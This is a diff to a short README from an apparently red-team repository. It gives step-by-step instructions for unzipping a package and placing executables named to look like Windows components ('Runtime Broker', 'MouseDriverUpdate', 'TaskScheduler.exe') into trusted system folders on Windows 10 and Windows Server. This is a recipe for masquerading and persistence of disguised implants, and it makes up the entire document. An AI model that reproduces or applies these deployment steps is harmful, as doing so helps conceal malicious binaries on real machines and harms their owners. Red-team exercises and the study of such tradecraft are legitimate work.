taw7879/CDT-RT/README.txt

+dist.zip: Windows 10
+distserver.zip: Windows Server

 Usage:
-1. Unzip dist.zip
+1. Unzip dist.zip or distserver.zip
-2. Go to C:\Program Files\Microsoft Update Health Tools and copy Runtime Broker into it or C:\Program Files\WindowsPowerShell\Configuration
+2. Go to C:\Program Files\Microsoft Update Health Tools and copy Runtime Broker into it or C:\Program Files\WindowsPowerShell\Configuration if server
 3. Go to C:\Program Files (x86) and add MouseDriverUpdate to it
 4. Go to C:\Program Files\Windows Mail and add MouseDriverUpdate to it
 5. Go to  C:\ProgramData, add TaskScheduler.exe to it